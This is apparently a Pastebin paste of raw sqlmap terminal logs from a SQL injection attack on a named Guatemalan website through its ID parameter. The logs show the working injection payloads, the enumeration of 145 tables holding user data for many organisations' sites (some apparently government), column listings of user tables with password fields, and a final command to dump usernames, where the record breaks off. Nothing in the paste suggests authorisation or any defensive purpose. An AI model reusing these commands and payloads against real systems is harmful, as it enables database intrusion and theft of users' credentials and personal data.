Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios --tables
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:53:07
- [12:53:07] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8
- [12:53:08] [INFO] resuming back-end DBMS 'mysql'
- [12:53:08] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=4233 AND 7933=7933
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=4233 AND SLEEP(5)
- ---
- [12:53:10] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Fedora 15 (Lovelock)
- web application technology: PHP 5.3.6, Apache 2.2.17
- back-end DBMS: MySQL 5.0
- [12:53:10] [INFO] fetching tables for database: 'dbusuarios'
- [12:53:11] [INFO] the SQL query used returns 145 entries
- [12:53:12] [INFO] retrieved: calendar
- [12:53:12] [INFO] retrieved: tbl_bnatelecomcom_precios
- [12:53:13] [INFO] retrieved: tbl_bnatelecomcom_precios2
- [12:53:14] [INFO] retrieved: tbl_calendar_aprofamorggt
- [12:53:15] [INFO] retrieved: tbl_calendar_casatibetguatemalaorg
- [12:53:15] [INFO] retrieved: tbl_calendar_cnnacomgt
- [12:53:16] [INFO] retrieved: tbl_calendar_cnnaorggt
- [12:53:16] [INFO] retrieved: tbl_calendar_conociendoguatemalacom
- [12:53:17] [INFO] retrieved: tbl_calendar_demo
- [12:53:17] [INFO] retrieved: tbl_calendar_gua05027org
- [12:53:18] [INFO] retrieved: tbl_calendar_ipmorggt
- [12:53:18] [INFO] retrieved: tbl_calendar_ipmorggt_public
- [12:53:19] [INFO] retrieved: tbl_calendar_mspasgobgt
- [12:53:19] [INFO] retrieved: tbl_calendar_ogaorggt
- [12:53:20] [INFO] retrieved: tbl_calendar_panadiverscom
- [12:53:21] [INFO] retrieved: tbl_calendar_pgngobgt
- [03:53:21] [INFO] retrieved: tbl_calendar_polsecorg
- [03:53:22] [INFO] retrieved: tbl_calendar_regdhorg
- [03:53:22] [INFO] retrieved: tbl_calendar_ripeoeaorg
- [12:53:23] [INFO] retrieved: tbl_calendar_semanasantaenlineacom
- [12:53:23] [INFO] retrieved: tbl_calendar_vientoencontracom
- [12:53:25] [INFO] retrieved: tbl_colegiados_colegiodefarmaceuticoscom
- [12:53:26] [INFO] retrieved: tbl_colegiados_saldo_colegiodefarmaceuticoscom
- [12:53:27] [INFO] retrieved: tbl_colegiados_saldo_quimicos_colegiodefarmaceuticoscom
- [12:53:28] [INFO] retrieved: tbl_csv_fields
- [12:53:28] [INFO] retrieved: tbl_csv_tables
- [12:53:29] [INFO] retrieved: tbl_puertos_sercimex
- [12:53:30] [INFO] retrieved: tbl_purchaseSession_bnatelecomcom
- [12:53:32] [INFO] retrieved: tbl_purchaseSession_creadoresvirtualescom
- [12:53:33] [INFO] retrieved: tbl_purchaseSession_demo
- [12:53:33] [INFO] retrieved: tbl_purchaseSession_discoverguatemalacomgt
- [12:53:34] [INFO] retrieved: tbl_purchaseSession_goathemayatravelcom
- [12:53:34] [INFO] retrieved: tbl_purchaseSession_telefoninotelcom
- [12:53:38] [INFO] retrieved: tbl_random_content_anabellycom
- [12:53:39] [INFO] retrieved: tbl_random_content_aprofamorggt
- [12:53:39] [INFO] retrieved: tbl_random_content_atacomgt
- [12:53:40] [INFO] retrieved: tbl_random_content_atravelcomgt
- [12:53:40] [INFO] retrieved: tbl_random_content_azulmodelajecom
- [12:53:41] [INFO] retrieved: tbl_random_content_biozoneguatemalacom
- [12:53:42] [INFO] retrieved: tbl_random_content_caciforggt
- [12:53:42] [INFO] retrieved: tbl_random_content_carrerasuniversitariascom
- [12:53:43] [INFO] retrieved: tbl_random_content_cnnaorggt
- [12:53:43] [INFO] retrieved: tbl_random_content_conociendoguatemalacom
- [12:53:44] [INFO] retrieved: tbl_random_content_ditcomgt
- [12:53:45] [INFO] retrieved: tbl_random_content_dobleviabiz
- [12:53:45] [INFO] retrieved: tbl_random_content_expodiscoverycom
- [12:53:50] [INFO] retrieved: tbl_random_content_globocentrocomgt
- [12:53:50] [INFO] retrieved: tbl_random_content_incidejovenorg
- [12:53:51] [INFO] retrieved: tbl_random_content_ipmorggt
- [12:53:51] [INFO] retrieved: tbl_random_content_iscargogroupcom
- [12:53:52] [INFO] retrieved: tbl_random_content_llatzercomgt
- [12:53:52] [INFO] retrieved: tbl_random_content_mijutiapacom
- [12:53:53] [INFO] retrieved: tbl_random_content_mpgobgt
- [12:53:53] [INFO] retrieved: tbl_random_content_mspasgobgt
- [12:53:54] [INFO] retrieved: tbl_random_content_pgngobgt
- [12:53:54] [INFO] retrieved: tbl_random_content_porminacionorg
- [12:53:55] [INFO] retrieved: tbl_random_content_semanasantaenlineacom
- [12:53:55] [INFO] retrieved: tbl_random_content_serinconet
- [12:53:56] [INFO] retrieved: tbl_random_content_sesangobgt
- [12:53:56] [INFO] retrieved: tbl_random_content_tecniscancom
- [12:54:26] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- [12:54:28] [INFO] retrieved: tbl_random_content_testvientoencontracom
- [12:54:28] [INFO] retrieved: tbl_random_content_yeguadacastanoblecom
- [12:54:29] [INFO] retrieved: tbl_selectivo_sercimex
- [12:54:40] [INFO] retrieved: tbl_telefoninotelcom_precios
- [12:54:43] [INFO] retrieved: tbl_tracking_aduana_sercimexcom
- [12:54:44] [INFO] retrieved: tbl_tracking_demo
- [12:54:44] [INFO] retrieved: tbl_tracking_detail_demo
- [12:54:45] [INFO] retrieved: tbl_tracking_detail_mspasgobgt
- [12:54:45] [INFO] retrieved: tbl_tracking_detail_sercimexcom
- [12:54:46] [INFO] retrieved: tbl_tracking_detail_worldeliverycom
- [12:54:46] [INFO] retrieved: tbl_tracking_mspasgobgt
- [12:54:47] [INFO] retrieved: tbl_tracking_sercimexcom
- [12:54:47] [INFO] retrieved: tbl_tracking_worldeliverycom
- [12:54:48] [INFO] retrieved: tbl_user_adua
- [12:54:48] [INFO] retrieved: tbl_user_alberguesdetecpancom
- [12:54:49] [INFO] retrieved: tbl_user_anabellycom
- [12:54:49] [INFO] retrieved: tbl_user_aprofamorggt
- [12:54:50] [INFO] retrieved: tbl_user_auda
- [12:54:50] [INFO] retrieved: tbl_user_bnatelecomcom
- [12:54:51] [INFO] retrieved: tbl_user_casatibetguatemalaorg
- [12:54:54] [INFO] retrieved: tbl_user_cat_adua
- [12:54:55] [INFO] retrieved: tbl_user_cat_alberguesdetecpancom
- [12:54:57] [INFO] retrieved: tbl_user_cat_anabellycom
- [12:54:59] [INFO] retrieved: tbl_user_cat_auda
- [12:55:30] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
- [12:55:31] [INFO] retrieved: tbl_user_cat_bnatelecomcom
- [12:55:32] [INFO] retrieved: tbl_user_cat_casatibetguatemalaorg
- [12:55:33] [INFO] retrieved: tbl_user_cat_colegiofarmaceuticoscom
- [12:55:33] [INFO] retrieved: tbl_user_cat_creadoresvirtualescom
- [12:55:35] [INFO] retrieved: tbl_user_cat_demo
- [12:55:36] [INFO] retrieved: tbl_user_cat_dhvihorg
- [12:55:39] [INFO] retrieved: tbl_user_cat_discoverguatemalacomgt
- [12:55:40] [INFO] retrieved: tbl_user_cat_doblefcom
- [12:55:40] [INFO] retrieved: tbl_user_cat_fogel-groupcom
- [12:55:41] [INFO] retrieved: tbl_user_cat_fogelgroupcom
- [12:55:41] [INFO] retrieved: tbl_user_cat_gua05027org
- [12:55:42] [INFO] retrieved: tbl_user_cat_hidcacom
- [12:55:42] [INFO] retrieved: tbl_user_cat_ipmorggt
- [12:55:43] [INFO] retrieved: tbl_user_cat_llanezasacom
- [12:55:43] [INFO] retrieved: tbl_user_cat_mijutiapacom
- [12:55:44] [INFO] retrieved: tbl_user_cat_mpgobgt
- [12:55:44] [INFO] retrieved: tbl_user_cat_mspasgobgt
- [12:55:45] [INFO] retrieved: tbl_user_cat_multiequiposnet
- [12:55:45] [INFO] retrieved: tbl_user_cat_pgngobgt
- [12:55:46] [INFO] retrieved: tbl_user_cat_ripeoeaorg
- [12:55:46] [INFO] retrieved: tbl_user_cat_telefoninotelcom
- [12:55:51] [INFO] retrieved: tbl_user_cat_testvientoencontracom
- [12:55:52] [INFO] retrieved: tbl_user_cat_vesuviocomgt
- [12:55:52] [INFO] retrieved: tbl_user_cat_vientoencontracom
- [12:55:53] [INFO] retrieved: tbl_user_colegiodefarmaceuticoscom
- [12:55:53] [INFO] retrieved: tbl_user_creadoresvirtualescom
- [12:55:54] [INFO] retrieved: tbl_user_demo
- [12:55:54] [INFO] retrieved: tbl_user_dhvihorg
- [12:55:55] [INFO] retrieved: tbl_user_discoverguatemalacomgt
- [12:55:55] [INFO] retrieved: tbl_user_doblefcom
- [12:55:56] [INFO] retrieved: tbl_user_extra_field
- [12:55:56] [INFO] retrieved: tbl_user_fogel-groupcom
- [12:55:57] [INFO] retrieved: tbl_user_fogelgroupcom
- [12:55:57] [INFO] retrieved: tbl_user_gua05027org
- [12:56:01] [INFO] retrieved: tbl_user_hidcacom
- [12:56:01] [INFO] retrieved: tbl_user_incidejovenorg
- [12:56:02] [INFO] retrieved: tbl_user_ipmorggt
- [12:56:02] [INFO] retrieved: tbl_user_llanezasacom
- [12:56:03] [INFO] retrieved: tbl_user_log_adua
- [12:56:03] [INFO] retrieved: tbl_user_log_alberguesdetecpancom
- [12:56:04] [INFO] retrieved: tbl_user_log_bnatelecomcom
- [12:56:04] [INFO] retrieved: tbl_user_log_demo
- [12:56:05] [INFO] retrieved: tbl_user_log_discoverguatemalacomgt
- [12:56:05] [INFO] retrieved: tbl_user_log_gua05027org
- [12:56:06] [INFO] retrieved: tbl_user_log_mijutiapacom
- [12:56:06] [INFO] retrieved: tbl_user_log_mspasgobgt
- [12:56:07] [INFO] retrieved: tbl_user_log_porminacionorg
- [12:56:07] [INFO] retrieved: tbl_user_log_telefoninotelcom
- [12:56:08] [INFO] retrieved: tbl_user_log_testvientoencontracom
- [12:56:08] [INFO] retrieved: tbl_user_log_vientoencontracom
- [12:56:10] [INFO] retrieved: tbl_user_mijutiapacom
- [12:56:11] [INFO] retrieved: tbl_user_mpgobgt
- [12:56:11] [INFO] retrieved: tbl_user_mspasgobgt
- [12:56:11] [INFO] retrieved: tbl_user_multiequiposnet
- [12:56:12] [INFO] retrieved: tbl_user_pgngobgt
- [12:56:12] [INFO] retrieved: tbl_user_porminacionorg
- [12:56:13] [INFO] retrieved: tbl_user_ripeoeaorg
- [12:56:13] [INFO] retrieved: tbl_user_telefoninotelcom
- [12:56:14] [INFO] retrieved: tbl_user_testvientoencontracom
- [12:56:14] [INFO] retrieved: tbl_user_vesuviocomgt
- [12:56:15] [INFO] retrieved: tbl_user_vientoencontracom
- Database: dbusuarios
- [145 tables]
- +---------------------------------------------------------+
- | `tbl_user_cat_fogel-groupcom` |
- | `tbl_user_fogel-groupcom` |
- | calendar |
- | tbl_bnatelecomcom_precios |
- | tbl_bnatelecomcom_precios2 |
- | tbl_calendar_aprofamorggt |
- | tbl_calendar_casatibetguatemalaorg |
- | tbl_calendar_cnnacomgt |
- | tbl_calendar_cnnaorggt |
- | tbl_calendar_conociendoguatemalacom |
- | tbl_calendar_demo |
- | tbl_calendar_gua05027org |
- | tbl_calendar_ipmorggt |
- | tbl_calendar_ipmorggt_public |
- | tbl_calendar_mspasgobgt |
- | tbl_calendar_ogaorggt |
- | tbl_calendar_panadiverscom |
- | tbl_calendar_pgngobgt |
- | tbl_calendar_polsecorg |
- | tbl_calendar_regdhorg |
- | tbl_calendar_ripeoeaorg |
- | tbl_calendar_semanasantaenlineacom |
- | tbl_calendar_vientoencontracom |
- | tbl_colegiados_colegiodefarmaceuticoscom |
- | tbl_colegiados_saldo_colegiodefarmaceuticoscom |
- | tbl_colegiados_saldo_quimicos_colegiodefarmaceuticoscom |
- | tbl_csv_fields |
- | tbl_csv_tables |
- | tbl_puertos_sercimex |
- | tbl_purchaseSession_bnatelecomcom |
- | tbl_purchaseSession_creadoresvirtualescom |
- | tbl_purchaseSession_demo |
- | tbl_purchaseSession_discoverguatemalacomgt |
- | tbl_purchaseSession_goathemayatravelcom |
- | tbl_purchaseSession_telefoninotelcom |
- | tbl_random_content_anabellycom |
- | tbl_random_content_aprofamorggt |
- | tbl_random_content_atacomgt |
- | tbl_random_content_atravelcomgt |
- | tbl_random_content_azulmodelajecom |
- | tbl_random_content_biozoneguatemalacom |
- | tbl_random_content_caciforggt |
- | tbl_random_content_carrerasuniversitariascom |
- | tbl_random_content_cnnaorggt |
- | tbl_random_content_conociendoguatemalacom |
- | tbl_random_content_ditcomgt |
- | tbl_random_content_dobleviabiz |
- | tbl_random_content_expodiscoverycom |
- | tbl_random_content_globocentrocomgt |
- | tbl_random_content_incidejovenorg |
- | tbl_random_content_ipmorggt |
- | tbl_random_content_iscargogroupcom |
- | tbl_random_content_llatzercomgt |
- | tbl_random_content_mijutiapacom |
- | tbl_random_content_mpgobgt |
- | tbl_random_content_mspasgobgt |
- | tbl_random_content_pgngobgt |
- | tbl_random_content_porminacionorg |
- | tbl_random_content_semanasantaenlineacom |
- | tbl_random_content_serinconet |
- | tbl_random_content_sesangobgt |
- | tbl_random_content_tecniscancom |
- | tbl_random_content_testvientoencontracom |
- | tbl_random_content_yeguadacastanoblecom |
- | tbl_selectivo_sercimex |
- | tbl_telefoninotelcom_precios |
- | tbl_tracking_aduana_sercimexcom |
- | tbl_tracking_demo |
- | tbl_tracking_detail_demo |
- | tbl_tracking_detail_mspasgobgt |
- | tbl_tracking_detail_sercimexcom |
- | tbl_tracking_detail_worldeliverycom |
- | tbl_tracking_mspasgobgt |
- | tbl_tracking_sercimexcom |
- | tbl_tracking_worldeliverycom |
- | tbl_user_adua |
- | tbl_user_alberguesdetecpancom |
- | tbl_user_anabellycom |
- | tbl_user_aprofamorggt |
- | tbl_user_auda |
- | tbl_user_bnatelecomcom |
- | tbl_user_casatibetguatemalaorg |
- | tbl_user_cat_adua |
- | tbl_user_cat_alberguesdetecpancom |
- | tbl_user_cat_anabellycom |
- | tbl_user_cat_auda |
- | tbl_user_cat_bnatelecomcom |
- | tbl_user_cat_casatibetguatemalaorg |
- | tbl_user_cat_colegiofarmaceuticoscom |
- | tbl_user_cat_creadoresvirtualescom |
- | tbl_user_cat_demo |
- | tbl_user_cat_dhvihorg |
- | tbl_user_cat_discoverguatemalacomgt |
- | tbl_user_cat_doblefcom |
- | tbl_user_cat_fogelgroupcom |
- | tbl_user_cat_gua05027org |
- | tbl_user_cat_hidcacom |
- | tbl_user_cat_ipmorggt |
- | tbl_user_cat_llanezasacom |
- | tbl_user_cat_mijutiapacom |
- | tbl_user_cat_mpgobgt |
- | tbl_user_cat_mspasgobgt |
- | tbl_user_cat_multiequiposnet |
- | tbl_user_cat_pgngobgt |
- | tbl_user_cat_ripeoeaorg |
- | tbl_user_cat_telefoninotelcom |
- | tbl_user_cat_testvientoencontracom |
- | tbl_user_cat_vesuviocomgt |
- | tbl_user_cat_vientoencontracom |
- | tbl_user_colegiodefarmaceuticoscom |
- | tbl_user_creadoresvirtualescom |
- | tbl_user_demo |
- | tbl_user_dhvihorg |
- | tbl_user_discoverguatemalacomgt |
- | tbl_user_doblefcom |
- | tbl_user_extra_field |
- | tbl_user_fogelgroupcom |
- | tbl_user_gua05027org |
- | tbl_user_hidcacom |
- | tbl_user_incidejovenorg |
- | tbl_user_ipmorggt |
- | tbl_user_llanezasacom |
- | tbl_user_log_adua |
- | tbl_user_log_alberguesdetecpancom |
- | tbl_user_log_bnatelecomcom |
- | tbl_user_log_demo |
- | tbl_user_log_discoverguatemalacomgt |
- | tbl_user_log_gua05027org |
- | tbl_user_log_mijutiapacom |
- | tbl_user_log_mspasgobgt |
- | tbl_user_log_porminacionorg |
- | tbl_user_log_telefoninotelcom |
- | tbl_user_log_testvientoencontracom |
- | tbl_user_log_vientoencontracom |
- | tbl_user_mijutiapacom |
- | tbl_user_mpgobgt |
- | tbl_user_mspasgobgt |
- | tbl_user_multiequiposnet |
- | tbl_user_pgngobgt |
- | tbl_user_porminacionorg |
- | tbl_user_ripeoeaorg |
- | tbl_user_telefoninotelcom |
- | tbl_user_testvientoencontracom |
- | tbl_user_vesuviocomgt |
- | tbl_user_vientoencontracom |
- +---------------------------------------------------------+
- [12:56:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
- [*] shutting down at 12:56:15
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_demo --columns
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 01:08:11
- [01:08:11] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian
- [00:08:11] [INFO] resuming back-end DBMS 'mysql'
- [00:08:12] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=4233 AND 7933=7933
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=4233 AND SLEEP(5)
- ---
- [01:08:13] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Fedora 15 (Lovelock)
- web application technology: PHP 5.3.6, Apache 2.2.17
- back-end DBMS: MySQL 5.0
- [01:08:13] [INFO] fetching columns for table 'tbl_user_demo' in database 'dbusuarios'
- [01:08:14] [INFO] the SQL query used returns 11 entries
- [01:08:15] [INFO] retrieved: ID_USER
- [01:08:15] [INFO] retrieved: mediumint(11)
- [01:08:16] [INFO] retrieved: strUserCateg
- [01:08:16] [INFO] retrieved: varchar(255)
- [01:08:16] [INFO] retrieved: strCodigo
- [01:08:17] [INFO] retrieved: varchar(64)
- [01:08:17] [INFO] retrieved: strUser
- [01:08:18] [INFO] retrieved: varchar(64)
- [01:08:18] [INFO] retrieved: strPassword
- [01:08:19] [INFO] retrieved: varchar(32)
- [01:08:21] [INFO] retrieved: strNombre
- [01:08:21] [INFO] retrieved: varchar(64)
- [01:08:22] [INFO] retrieved: strApellido
- [01:08:22] [INFO] retrieved: varchar(64)
- [01:08:23] [INFO] retrieved: strDireccion
- [01:08:23] [INFO] retrieved: varchar(255)
- [01:08:23] [INFO] retrieved: strTel
- [01:08:24] [INFO] retrieved: varchar(14)
- [01:08:25] [INFO] retrieved: strfax
- [01:08:25] [INFO] retrieved: varchar(14)
- [01:08:26] [INFO] retrieved: strEmail
- [01:08:27] [INFO] retrieved: varchar(128)
- Database: dbusuarios
- Table: tbl_user_demo
- [11 columns]
- +--------------+---------------+
- | Column | Type |
- +--------------+---------------+
- | ID_USER | mediumint(11) |
- | strApellido | varchar(64) |
- | strCodigo | varchar(64) |
- | strDireccion | varchar(255) |
- | strEmail | varchar(128) |
- | strfax | varchar(14) |
- | strNombre | varchar(64) |
- | strPassword | varchar(32) |
- | strTel | varchar(14) |
- | strUser | varchar(64) |
- | strUserCateg | varchar(255) |
- +--------------+---------------+
- [01:08:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
- [*] shutting down at 00:08:27
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -uhttp://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_demo --columns
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 00:12:52
- [01:12:53] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
- [01:12:53] [INFO] resuming back-end DBMS 'mysql'
- [01:12:53] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=4233 AND 7933=7933
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=4233 AND SLEEP(5)
- ---
- [01:12:55] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Fedora 15 (Lovelock)
- web application technology: PHP 5.3.6, Apache 2.2.17
- back-end DBMS: MySQL 5.0
- [01:12:55] [INFO] fetching columns for table 'tbl_user_demo' in database 'dbusuarios'
- [01:12:55] [INFO] the SQL query used returns 11 entries
- [01:12:55] [INFO] resumed: ID_USER
- [01:12:55] [INFO] resumed: mediumint(11)
- [01:12:55] [INFO] resumed: strUserCateg
- [01:12:55] [INFO] resumed: varchar(255)
- [01:12:55] [INFO] resumed: strCodigo
- [01:12:55] [INFO] resumed: varchar(64)
- [01:12:55] [INFO] resumed: strUser
- [01:12:55] [INFO] resumed: varchar(64)
- [01:12:55] [INFO] resumed: strPassword
- [01:12:55] [INFO] resumed: varchar(32)
- [01:12:55] [INFO] resumed: strNombre
- [01:12:55] [INFO] resumed: varchar(64)
- [01:12:55] [INFO] resumed: strApellido
- [01:12:55] [INFO] resumed: varchar(64)
- [01:12:55] [INFO] resumed: strDireccion
- [01:12:55] [INFO] resumed: varchar(255)
- [01:12:55] [INFO] resumed: strTel
- [01:12:55] [INFO] resumed: varchar(14)
- [01:12:55] [INFO] resumed: strfax
- [01:12:55] [INFO] resumed: varchar(14)
- [01:12:55] [INFO] resumed: strEmail
- [01:12:55] [INFO] resumed: varchar(128)
- Database: dbusuarios
- Table: tbl_user_demo
- [11 columns]
- +--------------+---------------+
- | Column | Type |
- +--------------+---------------+
- | ID_USER | mediumint(11) |
- | strApellido | varchar(64) |
- | strCodigo | varchar(64) |
- | strDireccion | varchar(255) |
- | strEmail | varchar(128) |
- | strfax | varchar(14) |
- | strNombre | varchar(64) |
- | strPassword | varchar(32) |
- | strTel | varchar(14) |
- | strUser | varchar(64) |
- | strUserCateg | varchar(255) |
- +--------------+---------------+
- [01:12:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
- [*] shutting down at 01:12:55
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt --column
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 01:26:14
- [01:26:14] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
- [01:26:15] [INFO] resuming back-end DBMS 'mysql'
- [01:26:15] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=4233 AND 7933=7933
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=4233 AND SLEEP(5)
- ---
- [01:26:17] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Fedora 15 (Lovelock)
- web application technology: PHP 5.3.6, Apache 2.2.17
- back-end DBMS: MySQL 5.0
- [01:26:17] [INFO] fetching columns for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
- [01:26:17] [INFO] the SQL query used returns 11 entries
- [01:26:18] [INFO] retrieved: ID_USER
- [01:26:18] [INFO] retrieved: mediumint(11)
- [01:26:20] [INFO] retrieved: strUserCateg
- [01:26:21] [INFO] retrieved: varchar(255)
- [01:26:21] [INFO] retrieved: strCodigo
- [01:26:22] [INFO] retrieved: varchar(64)
- [01:26:22] [INFO] retrieved: strUser
- [01:26:23] [INFO] retrieved: varchar(64)
- [01:26:23] [INFO] retrieved: strPassword
- [01:26:24] [INFO] retrieved: varchar(32)
- [01:26:24] [INFO] retrieved: strNombre
- [01:26:25] [INFO] retrieved: varchar(64)
- [01:26:25] [INFO] retrieved: strApellido
- [01:26:26] [INFO] retrieved: varchar(64)
- [01:26:26] [INFO] retrieved: strDireccion
- [01:26:27] [INFO] retrieved: varchar(255)
- [01:26:27] [INFO] retrieved: strTel
- [01:26:27] [INFO] retrieved: varchar(14)
- [01:26:28] [INFO] retrieved: strfax
- [01:26:28] [INFO] retrieved: varchar(14)
- [01:26:29] [INFO] retrieved: strEmail
- [01:26:29] [INFO] retrieved: varchar(128)
- Database: dbusuarios
- Table: tbl_user_mspasgobgt
- [11 columns]
- +--------------+---------------+
- | Column | Type |
- +--------------+---------------+
- | ID_USER | mediumint(11) |
- | strApellido | varchar(64) |
- | strCodigo | varchar(64) |
- | strDireccion | varchar(255) |
- | strEmail | varchar(128) |
- | strfax | varchar(14) |
- | strNombre | varchar(64) |
- | strPassword | varchar(32) |
- | strTel | varchar(14) |
- | strUser | varchar(64) |
- | strUserCateg | varchar(255) |
- +--------------+---------------+
- [01:26:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
- [*] shutting down at 01:26:29
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strUser --dump
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 01:31:36
- [01:31:36] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
- [01:31:37] [INFO] resuming back-end DBMS 'mysql'
- [01:31:37] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=4233 AND 7933=7933
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=4233 AND SLEEP(5)
- ---
